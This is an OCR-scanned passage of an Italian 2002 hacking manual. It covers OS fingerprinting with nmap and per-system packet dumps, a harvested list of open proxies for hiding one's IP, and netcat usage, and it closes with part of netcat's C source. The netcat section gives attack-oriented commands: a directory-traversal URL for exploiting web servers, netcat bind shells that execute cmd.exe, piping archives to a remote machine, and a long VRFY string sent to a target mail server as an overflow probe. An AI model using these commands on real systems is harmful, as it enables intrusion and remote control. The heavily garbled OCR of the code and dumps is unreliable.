Alcune implementazioni restituiscono lo stesso numero inviategli mentre altri lo 
ritornano incrementato di uno. 



• ICMP errore message quenching. Alcuni sistemi operativi seguono lo standard 
RFC1812 limitando il tasso con cui i messaggi d'errore vengono inviati. Inviando dei 
pacchetti UDP ad alcune porte casualmente scelte molto alte , è possibile 
conteggiare il numero di messaggi d'errore restituiti in un certo tempo. 

• ICMP message quoting. I sistemi operativi si differiscono nella quantità delle 
informazioni che vengono quotate quando un errore ICMP è stato incontrato. 
Esaminando il messaggio di quote è possibile capire di che sistema operativo si tratti. 

• Fragmentation handling. Alcuni stacks eseguono l'overwrite dei vecchi dati con quelli 
nuovi quando i frammenti vengono riassemblati. Notando come i pacchetti vengono 



Un metodo di analisi viene eseguito dal famoso NMAP mediante la specifica : 
nmap -O 192.168.255.12 

Usando appunto lo stack fingerprinting di namap è possibile quindi capire con un certa 
precisione con quale sistema operativo si ha a che fare. 

Penso ce sia inutile dire quanto sia importante questa fase nell'ambito dell'hacking. 
Chiaramente nella lista di prima non sono state riportate le identificazioni che derivano 
dall'osservazione di quelle che sono le caratteristiche dei software utilizzate per la gestione 
dei servers. 

Prediamo ad esempio un interrogazione di un server falsificando la connessione con telnet. 
Supponiamo di usare telnet collegato ad un certo IP usando la porta SMTP. 
Se l'header mostrato è di un meilserver come ad esempio SENDMAIL allora probabilmente si 
avrà a che fare con un sistema Unix. 

Questo era solo portato ad esempio per chiarire quanto avevo appena detto. 

Nella pagine precedente abbiamo detto che l'analisi dei pacchetti possono portare ad 

identificare il sistema operativo che gestisce il protocollo. 

Nell'ambito dei pacchetti IP il campo che ci interessa vedere è il secondo ovvero quello 
definito come TYPE OF SERVICE. 

Alcuni sistemi operativi utilizzano questo campo a 0x10 (minimize delay) per inzializzare delle 
sessioni TELNET. 

Molti altri sistemi operativi invece settano a 00 (normal) questo campo. 

Esiste un po di confusione su quello che viene definito con il termine di Explicit Congestion 

Notification (ECN) ovvero un nuovo standard che ha cambiato il formato dei pacchetti TCP. 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



Nel passato il campo TOS era abbastanza più semplice nel senso che c'era un campo di 
precedenza (3-bits), un campo TOS (4-bits) e un campo 'Deve essere zero' (MBZ) (1 bit) per 
un totale di 8 bits (1 byte). 

Nel campo di servzio TOS service un sistema doveva settare uno dei seguenti bits: 



1000 - Minimlze Delay 
0100 - Maximize Throughput 
0010 - Maximize Reliability 
0001 - Minimize monetary cost 



ECN inizio a essere sviluppato all'inizio con Linux 2.4. 
Con questo il campo TOS cambiò. 

In ogni caso la lunghezza dei campi ci poteva dire quanto fosse la lunghezza dei pacchetti. 
Questo includeva l'header incluso, l'header IP, e il carico utile. 

La lunghezza totale di un pacchetto è in ogni caso dipendente dal sistema operativo 
(specialmente un pacchetto SYN). 

Ogni sistema operativo setta le proprie opzioni TCP insieme a dei nop's, e queste opzioni 
incidono sulla lunghezza totale. 

In questo modo si fa si che ogni OS possieda una lunghezza unica. 

Un sistema operativo può essere identificato in alcuni casi anche solo dalla lunghezza dei 
pacchetti ma soltanto con i pacchetti SYN. 

Quando guardate un pacchetto TCP tenete sempre a mente che la maggior parte dei sistemi 
operativi utilizzano almeno una opzione TCP in un pacchetto SYN. 

Normalmente questa è l'opzione MSS la quale è 4 bytes di lunghezza (portanto a 44 bytes la 
lunghezza totale del pacchetto). 

In ogni caso se state vedendo un pacchetto di 40 che sta entrando o uscendo dalla vostra 
rete network dategli subito la caccia alla sorgente in quanto quella è un opera artistica. 
Il terzo campo al quale dovremo prestare attenzione è il campolP ID. 

Questo viene utilizzato fondamentalmente nella frammentazione ma può anche giocare un 

ruolo importante nell'identificazione del OS. 

Il Time-to-live (TTL) ci dice quanto un pacchetto può stare in linea. 

Questo è decrementato di uno per ogni hop (router) attraverso il quale passa 

In ogni caso questi sono i valori classici di alcuni sistemi operativi. 



LINUX 



17: 05:30. 773757 192.163.1.5.32770 > 192 . 168 . 1 . 55. telnet : S [tcp sum ok] 
2598191518:2598191518 (0) Tjin 5840 <mss 146 0 , sackOK, timest an^t 26S29 
O.nop, Trescale 0> (DF) (ttl 64, id 10415, leu 60) 

4500 003c 28af 4000 4006 8e80 c0a8 0105 




• TTL64 

• Windows: 5840 

• TCP Options: Sets MSS, Timestamps, sackOK, wscale and 1 nop 

• Packet Length:60 
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15: 04:46. 254692 < 192 . 16S . 1. 55 . 23109 > 192. 

3609264599:3609264599(0) win 163S4 <mss 146 

0,nqp,nqp, [ |tcp ] > (DF) (ttl 64, id 32923) 

4500 0040 S09b 4000 4006 3690 cOaS 0137 
cOaS 0105 5a4£ 0016 d721 01d7 0000 0000 





• TTL: 64. This value is used by many other operating systems as well. You will not be 
able to detect OpenBSD based on this value alone. 

• Window Size: 1 6384. This value is used by other operating systems as well. 

• TCP Options: Uses the same options as Linux BUT instead of setting one nop, 
OpenBSD uses 5 nops 

• IP ID: Totally random. Will need more than one packet to use effectively. 

• Total Packet Length: 64 Bytes. This is a key indicator. 



SOLARIS 7 



09: 57:19. 031944 < 192 . 16S . 0. 25 . 32S41 > 192 . 16S . 0. 1 . telnet: S 
83052643:33052643(0) uin S760 <ess 1460> (DF) (ttl 255, id 53490) 

4500 002c d0f2 4000 ff06 296e cOaS 0019 
cOaS 0001 8049 0017 04f3 4863 0000 0000 
6002 2238 26cd 0000 0204 05b4 5555 



• TTL: 255 

• Window Size: 8760 

• TCP Options: MSS 

• IP ID: Increments by one ALL of the time. 

• Total Packet Length: 44 bytes 



AIX4.3 



08:15:55.012972 192.168.0.60.57551 > 192.168.0 


. 1. telnet: 


S [tcp sum ok] 


1677269879:1677269879(0) tjìii 16384 1460> 


[to; 0x10] 


(ttl 60, id 


51280) 






4510 002c c850 0000 


3c06 34de 


cOaS 003c 


cOaS 0001 eOcf 0017 


63 f9 lb77 


0000 0000 


6002 4000 7641 0000 


0204 05b4 


0000 



• TTL: 64. Resembles Linux and OpenBSD 

• Window: 1 6384. Resembles Windows 2000 (covered next) 

• TCP Options: MSS. Like Solaris 

• Packet Length: 44 bytes. Again, like Solaris. 

• IP ID: Increments by one ALL of the time 



WINDOWS 2000 
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05:52:29. 715325 < 192. 168. 0 . 1. 1040 > 192 . 168 . 0 . 55 . telnet: 3 
3595397846:3595397846(0) win 16384 <mss 1460 ,nop,nop, sackOK> (DF) ( ttl 
128, id 37348) 

4500 0030 91e4 4000 8006 e75a c0a8 0001 
c0a8 0037 0410 0017 d64d 6ad6 0000 0000 
7002 4000 7c* 0 000 0204 05b4 0 1 0 1 0402 



• TTL: 1 28. Almost ali Windows Operating systems use this TTL. 

• Window: 1 6384 - just like AIX 4.3 

• TCP Options: MSS, sackOK, 2 nops 

• Packet Length: 48 bytes. Unique among the operating systems that I have tested. 

• IP ID: Increments by one ALL of the time 

L'identificazione del sistema operativo può avvenire in ogni caso anche dall'osservazione di 
altri fattori come ad esempio cercando di aprire la porta 80 relativa ad http con netcat o con 
telnet. 

Se la risposta vi viene data da MS allora sicuramente avrete a che fare con un sistema 
operativo Windows. 



TCP/I P Stack Fingerprinting 

Non penso che sia il caso di ripetere che la parte legata all'ottenimento delle informazioni da 
parte di un hacker sia la parte più delicata dalla quale dipende in gran parte il successo della 
missione. 

Esistono diverse strade per riuscire a comprendere il grado di vulnerabilità dell'host, uno dei 
quali è appunto legato alla metodologia di identificazione del sistema operativo appena visto. 
Nel capitolo precedente abbiamo fatto accenno all'uso di NMAP per lo svolgimento di questo 
compito. 

Abbiamo detto che un sistema operativo con su TCP risponde all'invio di certi pacchetti in 
modi differenti. 

L'analisi delle risposte e quindi della struttura dei pacchetti stessi permette l'individuazione 
dell' OS. 

NMAP interroga gli host remoti inviandogli otto differenti tipi di pacchettie osservando le 
risposte date dagli hosts a questi. 

Ciascuno degli otto pacchetti differenti vengono creati in modo tale da mettere l'host di 
destinazione nelle condizioni nella quale ci sono altre probabilità che possano capitare due 
cose. 

1 . Lo stack TCP del sistema operativo di destinazione risponderà unicamente in 
confronto ad uno stack TCP di un altro sistema operativo. 

2. Lo stack TCP del sistema operativo di destinazione risponderà in un modo coerente. 

Conoscendo come lo stack TCP del sistema operativo risponderà a ciscuno degli otto 
pacchetti, permetterà a NMAP di determinare con un alto livello di precisione non solo il 
sistema operativo ma ancyhe la versione di questo. 

I pacchetti creati per I tests sono inviati uno alla volta dalla macchina sorgente con sopra 
NMAP 

I tests sono documentati nella tabella che segue: 



Test 


Descrizione 


TSeq 


Vine einviata una serie di pacchetti SYN per vedere quale numero 
di seuqneza questi generano. 


TI 


Viene inviato un pacchetto SYN con l'opzione (WNMTE) . 
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T2 


Un pacchetto NULL con 1' opzione (WNMTE) viene inviato ad una 
porta TCP aperta. 


T3 


Un pacchetto SYN, FIN, PSH, URG con 1' opzione (WNMTE) è inviato ad 
una porta aperta TCP. 


T4 


Un pacchetto ACK con 1' opzione (WNMTE) viene inviato ad una porta 
TCP aperta. 


T5 


Un pacchetto SYN con 1' opzione (WNMTE) settato viene inviato ad 
una porta chiusa . 


T6 


Un pacchetto ACK con 1' opzione (WNMTE) settata viene inviata ad 
una porta chiusa . 


T7 


Un pacchetto FIN, PSH, URG con 1' opzione (WNMTE) voiene inviato ad 
una porta chiusa. 


PU 


Un pacchetto viene inviato ad una porta UDP chiusa. 



Diverse metriche vengono osservate per ciascuno dei primi sette tests al fine di aiutare a 
determinare il sistema operativo di destinazione. 
Queste sono: 



1 . Se un host ha risposto o meno. 

2. Se un host ha risposto o meno ad un pacchetto che ha il bit 'Don't Fragment" settato 

3. La Window Size è settata dall'host di destinazione nel pacchetto di risposta. 

4. La relazione del numero di acknowledgement del pacchetto TCP inviato in risposta 
al pacchetto prcedente di NMAP. 

5. I Flags settati nel pacchetto TCP inviato come risposta. 

6. Le opzioni TCP che ci sono nel pacchetto di risposta.. 
7. 

I primi tests (Tseq) e gli ultimi (PU) usano metriche differenti. 

Tutte queste metriche possono misurare alcune differenze tra sistemi operativi e tra le 
versioni di questi. 

NMAP contiene contiene tutti questi test di fingerprints all'interno di un file chiamato nmap- 
os-fingerprints. 

Ci sono alcune centinaia che includono almeno un riferimento a qualsiasi sistema operativo. 
Una voce classica è simile a quella che segue : 

Fingerprint Windows 2000 

TSeq (Class=RI%gcd=<5%SI=>BBB&<FFFF) 

TI (DF=Y%W=402E%ACK=S++%Flags=AS%Ops=MNWNNT) 

T2 (Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=) 

T3 (Resp=Y%DF=Y%W=402E%ACK=S++%Flags=AS%Ops=MNWNNT) 

T4 (DF=N%W=0%ACK=O%Flags=R%Ops=) 

T5 (DF=N%W=0%ACK=S++%Flags=AR%Ops=) 

T6 (DF=N%W=0%ACK=O%Flags=R%Ops=) 

T7 (DF=N%W=0%ACK=S++%Flags=AR%Ops=) 

PU(DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E) 

I test da T1 fino a T7 sono tutti test TCP. 

I simboli '%' delimitano la metricaq usata nel fingerprinting. 

II simbolo T è utilizzato per rappresentare "or" in un determinato set di risposte 
Le metriche sono specificate in modo dettagliato nella tabella che segue. 



Metric I Valid Values I Description 
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Resp 


Y = There was a 
response 

N = There was no 
response 


Whether or not the host responded 
to the test packet by sending a 
reply. 


DF 


Y = DF was set 

N = DF was not set 


Whether or not the host responding 
to the test packet sent the "Don' t 
Fragment" bit in response. 


W 


Can be a two-byte 
integer expressed in 
hexadecimal . 


Window advertisement size sent by 
the host responding to the test 
packet . 


ACK 


0 = ack zero 
S = ack sequence number 
S++ = ack sequence 
number + 1 


The acknowledgement sequence number 
response type. 


Flags 


S = SYN 
A = ACK 
R = RST 
F = FIN 
U = URG 
P = PSH 


Indicate what flags were set in the 
responding packet . 


Ops 


M = MSS 
E = Echoed MSS 
W = Window Scale 
T = Timestamp 
N = No Option 


Options sent back by the host 
responding to the test packet . 
There can be any number of options 
set (including none) in any order. 



Per esempio prendiamo il primo test nell'esempio precedente.: 



Tl(DF=Y%W=402E%ACK=S++%Flags=AS%Ops=MNWNNT) 

Questo test specifica che il pacchetto di risposta dell'host target all'invio fatto da NMAP 
relativo ad un pacchetto SYN con dlle opzioni che possiedono le seguenti caratteristiche: 



Resp= Resp is not defined; which means the metric is 

satisfied whether or not the target replies 

DF=Y The "Don' t Fragment" bit was set 

W=402E The window size was 402E 

ACK=S++ Acknowledgement number was one plus the initial 

sequence number 

Flags=AS The packet had the SYN/ACK flags set 

Ops=MNWNNT The packet had the following option flags set in 

this order: MNWNNT 



Quello che segue invece è un DUMP che mostra come il test viene eseguito 
Sulla macchina sorgente c'e' NMAP e ha come IP (1 0.0.2.3) mentre la macchina di 
destinazione ha come IP (1 0.0.2.6) 
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Packet 1 
(NMAP) 


265,tlmestamp 1061109567 O,eol> (ttl 59, id 9783) 


Target ' s 
Response 


10:37:42.324518 10.0.2.6.135 > 10.0.2.3.34031: S 
2863638239:2863638239 (0) ack 1338197985 win 16430 <mss 
1460, nop, wscale 0 , nop, nop, tlmestamp 0 0> (DF) (ttl 128, id 
15245) 



Il primo pacchetto che NMAP spedisce è un pacchetto SYN con alcune opzioni TCP. 
Guardando la traccia e uasando la nostra metrica possiamo dedurre quanto segue: 

• Il target risponde con la metrica Resp=Y 

• Il bit "Don't Fragment" (DF) viene settato nella risposta mediante la metrica DF=Y 

• La diemsnione della finestra è 1 6430. Così la metrica W=402E 

• Il numero di acknowledgement è uguale al numero di sequenza più uno.. Così la 
metrica Ack=S++ 

• Un pacchetto SYN/ACK virene inviato di risposta. Con una metrica Flags=AS 

• L'opzione TCP con l'opzione MNWNNT è inviato di risposta. Così la metrica 
Ops=MNWNNT. 

Il fingerprint per il est T1 (Test 1) assomiglia a : 



Source 
Test 

Packet 2 
(NMAP) 


10:37 -.42.324315 10.0.2.3.34032 > 10.0.2.6.135: . win 4096 
<wscale 10,nop,mss 265, tlmestamp 1061109567 0,eol> (ttl 59, Id 
1545) 


Target ' s 
Response 


10:37:42.324718 10.0.2.6.135 > 10.0.2.3.34032: R 0:0(0) ack 
1338197984 win 0 (ttl 128, id 15246) 



Il secondo test fa si che NMAP invìi un pacchetto NULL con alcune opzioni TCP. 

• Il target risponde con la metrica Resp=Y 

• Il bit "Don't Fragment" (DF) viene settato nella risposta mediante la metrica DF=N 

• La diemsnione della finestra è 0. Così la metrica W=0 

• Il numero di acknowledgement è uguale al numero di sequenza. Così la metrica 
Ack=S 

• Un pacchetto ACK e un RESET viene inviato di risposta. Con una metrica Flags=AR 

• Non ci sono opzioni TCP Così la metrica Ops=. 

Il fingerprint per T2: 



T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=) 



Source 
Test 

Packet 3 
(NMAP) 


10:37:42.327823 10.0.2.3.34033 > 10.0.2.6.135: SFP 
1338197984:1338197984 (0) win 4096 urg 0 <wscale 10,nop,mss 
265, tlmestamp 1061109567 0,eol> (ttl 59, id 4649) 


Target ' s 
Response 


10:37:42.328265 10.0.2.6.135 > 10.0.2.3.34033: S 
2863675212:2863675212 (0) ack 1338197985 win 16430 <mss 
1460, nop, wscale 0 , nop, nop, tlmestamp 0 0> (DF) (ttl 128, id 
15247) 
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Nel terzo test NMAP invia un pacchetto SYN/FIN/PSH/URG con alcune opzioni 
Il fingerprint di T3: 



T3(Resp=Y%DF=Y%W=402E%ACK=S ++ %Flags=AS%Ops=MNWNNT) 



Source 
Test 

Packet 4 
(NMAP) 


10:37 : 42. 334937 10.0.2.3.34034 > 10.0.2.6.135: . ack 0 win 4096 
<wscale 10,nop,mss 265, tlmestamp 1061109567 O,eol> (ttl 59, id 
6192) 


Target ' s 
Response 


10:37:42.335359 10.0.2.6.135 > 10.0.2.3.34034: R 0:0(0) win 0 
(ttl 128, id 15248) 



Nel quarto test NMAP invia un pacchetto ACK con delle opzioni 



Source 
Test 

Packet 5 
(NMAP) 


10:37:42.340712 10.0.2.3.34035 > 10.0.2.6.32775: S 
1338197984:1338197984 (0) win 4096 <wscale 10,nop,mss 
265,timestamp 1061109567 0,eol> (ttl 59, id 62508) 


Target ' s 
Response 


10:37:42.341113 10.0.2.6.32775 > 10.0.2.3.34035: R 0:0(0) ack 
1338197985 win 0 (ttl 128, id 15249) 



Nel quinto test viene inviato un pacchetto SYN a delle porta chiuse. 



T5(DF=N%W=0%ACK=S++%Flags=AR%Ops=) 



Source 
Test 

Packet 6 
(NMAP) 


10:37:42.343991 10.0.2.3.34036 > 10.0.2.6.32775: . ack 0 win 
4096 <wscale 10,nop,mss 265 , timestamp 1061109567 0,eol> (ttl 
59, id 18026) 


Target ' s 
Response 


10:37:42.344416 10.0.2.6.32775 > 10.0.2.3.34036: R 0:0(0) win 0 
(ttl 128, id 15250) 



Nel caso del sesto test viene inviato un pacchetto ACK 



Source 
Test 

Packet 7 
(NMAP) 


10:37:42.349443 10 .0 .2 .3 .34037 > 10.0.2.6.32775: FP 
1338197984:1338197984 (0) win 4096 urg 0 <wscale 10,nop,mss 
265, timestamp 1061109567 0,eol> (ttl 59, id 37913) 


Target ' s 
Response 


10:37:42.349840 10.0.2.6.32775 > 10.0.2.3.34037: R 0:0(0) ack 
1338197985 win 0 (ttl 128, id 15251) 



Nel settimo e ultimo test viene inviato un pacchetto FIN/PSH/URG 



T7(DF=N%W=0%ACK=S++%Flags=AR%Ops=) 
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Programmi particolari 

Esistono alcuni tipi di programmi particolari il cui scopo differisce da quelli visti ffino a questo 
punto. 

Di cosa si tratta vi chiederete ? 
Partiamo dal primo. 

Chi conosce il concetto di anonymizer sa che questi altro non sono se non dei proxy che un 
utente può utilizzare per rimappare il proprio IP. 

In altre parole il settaggio di Internet Explorer permette di stabilire quale indirizzo e quale 
porta usare come proxy. 

Eseguendo la navigazione usando uno di questi, l'indirizzo visto in caso di analisi sarà di fatto 
quello del proxy e non quello originale. 

Chiaramente per poter utilizzare un proxy è necessario sapere diverse cose, a parte il fatto 
che questo non deve essere vincolato da password. 

Esiste un utility chiamata PROXY HUNTER la quale scandisce la rete alla rcerca di sistemi 
adatti per essere usati come proxy. 



Il software permette di stabilire I ranges sia degli IP che quelli delle porte da passare. 

Nella lista in basso, all'interno della dialog, vengono mostrati gli indirizzi sui quali sono stati 

individuati dei proxy. 

Il programma genera una lista esportabile. 



202.96.0.171: 8080QHTTP 
202.96.18. 73:8080@HTTP 
202 .96.31.4: 8080QHTTP 
202 .96.31.103: 8080QHTTP 
202.96. 31 . 114: 8080@HTTP 
202 . 96 . 44 . 32 : 8080QHTTP 
202.96. 51 . 9:8080@HTTP 
202 .96.57.173: 8080@HTTP 
202.96. 61.100:8080@HTTP 
202 .96.65.75 : 8080QHTTP 
202.96. 66.147 :8080@HTTP 
202.96. 66.148:8080@HTTP 
202.96. 66.151:8080@HTTP 
202.96. 66.157 :8080@HTTP 
202.96. 66.146:8080@HTTP 
202.96. 66.150:8080@HTTP 
202.96. 66.233:8080@HTTP 
202.96. 70.226:8080@HTTP 
202.96. 70.227:8080@HTTP 
202.96. 75.23:8080@HTTP 
202.96. 75.25:8080@HTTP 
202.96. 75.199:8080@HTTP 
202.96. 75.230:8080@HTTP 
202.96. 75.231:8080@HTTP 
202.96. 75.234:8080@HTTP 
202. 96. 80 .8:8080@HTTP 
202.96. 80.16:8080@HTTP 
202.96. 80 . 62:8080@HTTP 
202.96. 80 . 67 :8080@HTTP 
202.96.80. 76:8080@HTTP 
202.96. 81 . 132:8080@HTTP 
202.96. 81 . 133:8080@HTTP 
202.96. 81 . 152:8080@HTTP 
202 .96.88.34: 8080QHTTP 
202.96. 88.49:8080@HTTP 
202. 96. 89.49:8080@HTTP 
202. 96. 91 .27 :8080@HTTP 
202 .96.94.21 : 8080@HTTP 
202.96.94.19:8080@HTTP 
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202 


96. 


96. 84:8080@HTTP 


202 


96. 


96. 105:8080@HTTP 


202 


96. 


96. 114:8080@HTTP 


202 


96. 


96. 119:8080@HTTP 


202 


96. 


98 . 41 : 8080QHTTP 


202 


96. 


103.40:8080@HTTP 


202 


96. 


1 03 . 251 : 8080QHTTP 


202 


96. 


105.1:8080@HTTP 


202 


96. 


105 .3:8080@HTTP 


202 


96. 


105. 7 :8080@HTTP 



Le connessioni RAW 



Come abbiamo visto e come vedremo ancora successivamente spesso esiste la necessità di 
lavorare su determinati servers evitando la connessione mediante i client specifici di quel 
protocollo. 

Cosa significa questa esclamazione ? 

Semplicemente che per applicare alcune metodologie ad un server SMTP è necessario non 
utilizzare OUTLOOK o programmi simili ma potrebbe essere necessario usare al suo posto 
TELNET. 

Lo stesso dicasi con qualsiasi altro protocollo a partire dal DNS per arrivare a http. 

TELNET possiede un piccolo problema e precisamente potrebbe risentire dell'interpretazione 

fatta rispetto alll'input/output. 

In moltissimi casi necessitiamo di metodi che ci permettano la connessione in modalità RAW 
con un certo server lanciabile da riga di comando in modo tale da poter essere inserito dentro 
a comandi composti gestiti tramite PIPE. 
Uno di questi è quello che vedremo successivamente, NETCAT. 

Una di queste utilità gestite con interfaccia WINDOWS è RAW PORT CONNECTOR il quale 
riesce a creare una connessione diretta con l'host specificato usando la porta voluta. 



%. R/dffl/ Pi*rL EwmerJLur \ Telnet} 



Iùqs Cnimectiorì Statistica 




Il programma è di uso semplicissimo in quanto come parametri, inseribili direttamente 
nell'unica maschera, ci sono solo l'host e la porta di destinazione. 
Dicevamo prima che spesso è importantissimo il collegamento possibile tra più processi 
eseguito tramite le PIPE sia del DOS che dello Unix. 

Chiaramente la possibilità d'uso da linea di comando potrebbe permettere all'utility di sfruttare 
le possibilità legate alla redirezione eseguita con i vari < > e ». 

La modalità RAW è importante per qualsiasi funzione di gestione dei servers dove si pretende 
che quanto viene passato non sia di fatto processato ed interpretato dal programma di 
gestione della connessione. 
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N etcat 

In alcuni tipi di attacchi abbiamo parlato dell'uso di NETCAT. 

Netcat è in grado di risolvere alcuni tipi di problemi che deriverebbero dall'uso dei browser 
nell'ambito dell'applicazione di certe tecniche indirizzate verso delle porte specifiche come 
potrebbero esserlo quelle dei web servers. 

In altri capitoli abbiamo visto, ad esempio, alcune sequenze di caratteri che potevano essere 
utilizzate indirizzate verso la porta 80 di qualche IP cn lo scopo di sfruttare certi BUGS. 

I browser spesso includono dei filtri che permettono di filtrare alla base questi caratteri. 
Ad esempio sequenze di caratteri come : 

http://www.host.com/. ./. ./. ./. ./file 

sono filtrate da sistemi com4e Internet Explorer e quindi non vengono passate ai WEB. 
NETCAT costituisce un metodo di scrittura e lettura RAW verso gli IP/porte specificate. 

II programma è possibile utilizzarlo sia in ambiente Unix che in quello Windows in quanto 
questo si basa sui socket. 

Netcat è un po' come i coltelli svizzeri multi funzioni jn quanto permette : 

• Connessioni in ingresso ed in uscita, TCP e UDP, da e per qualsiasi porta 

• Controllo completo forward/reverse del DNS coin tanto di warnings 

• Uso locale di qualsiasi porta 

• Possibilità di utilizzare qualsiasi indirizzo sorgente configurato 

• Port scaning incorporato con randomizer 

• Possibilità di leggere gli argomenti da un standard d'input 

• Ritardo sull'invio settabile (n linee al secondo) 

• Dump esadecimale dei dati trasmessi e ricevuti 

• Permette ad un'altra applicazione di stabilire una connessione 

• Risponditore TELNET 

• Esecuzione in background 

L'uso più semplice di netcat è quello legato alla possibilità di buttare giù una pagina WEB da 
un WEB Server. 

Come saprete il CAT di Unix è un po' come il type ddel DOS i quali leggono da un file 

presente su disco e visualizzano a video il contenuto. 

NETCAT riesce appunto a leggere e scrivere da una connessione di rete. 

Tramite NETCAT ad esempio potete vedere l'header di un server WEB. 

Create un file G ET. TXT con dentro : 



Ora richiamate NETCAT con : 

ne -v www.website.com 80 < get.txt 

L'opzione -v stà per VERBOSE MODE. 

Un esempio molto più utile è invece legato al fatto di aprire una piccola shell sulla macchina 
remota. 

Il comando da dare è : 



L'argomento -p 23 stà per port 23 (telnet) mentre -e cmd.exe stà per execute cmd.exe 
Altri comandi possono essere ad esempio : 



oppure 

ne -v xxx.xxx.xxx.xx53 
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dove chiaramente xxx.xxx.xxx.xx è un indirizzo IP. 

L'aggancio con servizio NETBIOS Session Service utilizzante la porta 139 può avvenire con : 
ne -v -L -e cmd.exe -p 139 -s xxx.xxx.xxx.xxx 

Il concetto d'uso della PIPE di Unix può essere utilizzata per abbinare le funzioni di NETCAT 
con quelle di altre Utilities. 
Ad esempio : 

tar cfp - /some/dir | compress -c | ne -w 3 othermachine 1234 

oppure 



Dobbiamo sempre ricordarci che NETCAT potrebbe essere utilizzato mediante la 
congiunzione di più comandi tramite il pipe ovvero |. 

Ad esempio l'output di un piccolo programma on PERL viene preso da NETCAT e inviato 
all'host di destinazione. 

L'esempio lo vedremo anche con i buffer overflow in ogni caso al fine di fare vedere l'uso dei 
pipe ci costa poco vederlo qui a seguito : 

echo "vrfy 'peri -e print "a" x 1000''" Ine www.target.com 25 

I sorgenti di NETCAT sono i seguenti . 

II primo è Netcat.c 



/* Netcat 1.00 951010 



A damn useful little "backend" utility begun 950915 or thereabouts , 
as *Hobbit* ' s first real stab at some sockets programming. Something that 
should nave and indeed may have existed ten years ago, but never became a 
standard Unix utility. IMHO, "ne" could take its place right next to cat, 
cp, rm, mv, dd, ls, and ali those other cryptic and Unix-like things. 

Read the README for the whole story, doc, applications, etc. 



Layout : 

conditional includes: 
includes : 
handy defines : 
globals: 

malloced globals: 
cmd-flag globals: 
support routines : 
main : 



todo: 

more of the portability swamp, and an updated generic.h 
frontend progs to generate various packets, raw or otherwise . . . 
char-mode [ebreak, fcntl-unbuffered, etc...] 
connect-to-all-A-records hack 
bluesky: 

RAW mode! 

backend progs to grab a pty and look like a real telnetd? ! 



iinclude "generic.h" 



/* same as with L5, skey, etc */ 



/* conditional includes 
/* iundef _POSIX_SOURCE 
idefine RAVE_BIND 
idefine HAVE_HELP 
/* idefine ANAL 
iifdef HAVE_STDLIB_H 
iinclude <stdlib.h> 
ielse 



very messy section : */ 

/* might need this for something? */ 
/* XXX — for now, see below. . . */ 
/* undefine if you dont want the help text */ 

/* if you want case-sensitive DNS matching */ 
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iendif 



/* have to do this *before* including types.h. xxx: Linux stili has it wrong */ 



iifdef FD_SETSIZE 

iundef FD_SETSIZE 

iendif 

Hfdef WIN32 

idefine FD_SETSIZE 64 

likes 64 */ 

ielse 

idefine FD_SETSIZE 16 
iendif 

iinclude <sys/types . h> 



/* should be in types . h, butcha never know. */ 
/* if we ever need more than 16 active */ 
/* fd's, something is horribly wrong! */ 

/* WIN32 does this as an array not a bitfield and it 



/* < — this '11 give us a long anyways, wtf */ 
/* *now* do it . Sigh, this is broken */ 



iifdef WIN32 
iundef HAVE_RANDOM 
iundef IP_OPTIONS 
iundef SO^REUSEPORT 
iinclude <windows.h> 
iendif 



iifdef HAVE_RANDOM 
idefine SRAND srandom 
idefine RAND random 
ielse 

idefine SRAND srand 
idefine RAND rand 
iendif /* HAVE^RANDOM */ 



/* xxx: these are rsh leftovers, move to new generic.h */ 
/* will we even need any nonblocking shit? Doubt it . */ 

/* get FIONBIO from sys/filio.h, so what if it is a compatibility feature */ 

/* iinclude <sys/filio.h> */ 

/* 

iinclude <sys/ioctl . h> 
iinclude <sys/file.h> 



/* includes: */ 



iifdef WIN32 
iinclude "getopt.h" 
idefine sleep 
idefine strcasecmp 
idefine EADDRINUSE 
idefine ETIMEDOUT 
idefine ECONNREFUSED 
iendif 



_sleep 
strcmpi 
WSAEADDRINUSE 
WSAETIMEDOUT 
WSAECONNREFUSED 



iifndef WIN32 
iinclude <sys/time.h> 
ielse 

iinclude <time.h> 
iendif 



/* timeval, time_t */ 



iinclude <setjmp.h> 



/* jmp_buf et al */ 



iifndef 

iinclude 

iinclude 

iinclude 

iinclude 

iinclude 

iinclude 

ielse 

iinclude 

iinclude 

iinclude 

iinclude 

iendif 



WIN32 

<sys/socket . h> /* basics, SO and AF_ defs, sockaddr, 

<netinet/in . h> /* sockaddr in, htons, in_addr */ 

<netinet/in_systm. h> /* mise crud that netinet/ip.h references */ 
<netinet/ip.h> /* IPOPT__LSRR, header stuff */ 



<netdb . h> 
<arpa/ inet .h> 

<fcntl . h> 
<io.h> 
<conio . h> 
<winsock . h> 



hostent, gethostby* 
inet__ntoa */ 



getservby* */ 



iinclude 
iinclude 
iinclude 



<stdio.h> 
<string . h> 
<errno . h> 



/* strepy, strchr, yadda yadda */ 
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/* handy stuff: */ 
idefine SA struct sockaddr /* 
idefine SAI struct sockaddr_in 
idefine IA struct in__addr /* 

/* 

idefine SLEAZE^PORT 31337 /* 
idefine USHORT unsigned short /* 
idefine BIGSIZ 8192 /* 
idefine SMALLSIZ 256 /* 



socket overgeneralization braindeath */ 

/* . . . whoever carne up with this model */ 
. . . should be taken out and shot, */ 
. . . not that TLI is any better. sigh. . */ 
for UDP-scan RTT trick, change if ya want */ 
use these for options an ' stuff */ 
big buffers */ 

small buffers, hostnames, etc */ 



iifndef INADDR_NONE 

idefine INADDR_NONE Oxffffffff 

iendif 

iifdef MAXHOSTNAMELEN 
iundef MAXHOSTNAMELEN 
iendif 

idefine MAXHOSTNAMELEN 256 

struct host_poop { 

char name [MAXHOSTNAMELEN] ; /* 
char addrs[8] [24] ; /* 
struct in_addr iaddrs [8] ; /* 

}; 

idefine HINF struct host_poop 

struct port_poop { 

char name [64] ; /* 
char anum [8]; /* 
USHORT num; /* 

}; 

idefine PINF struct port_poop 



/* might be too small on aix, so fix it */ 



dns name */ 

ascii-format IP addresses */ 
real addresses: in_addr . s_addr : 



name in /etc/services */ 
ascii— format number */ 
real host—order number */ 



ulong */ 



/* globals: */ 

jmp_buf jbuf; 

int jval = 0; 

int netfd = —1; 

int ofd = 0; 

static char unknown[] 

static char p_tcp[] = 

static char p_udp[] = 



/* 
/* 



timer crud 
timer crud 



*/ 
*/ 



/* hexdump output fd */ 
= " (UNKNOWN) "; 
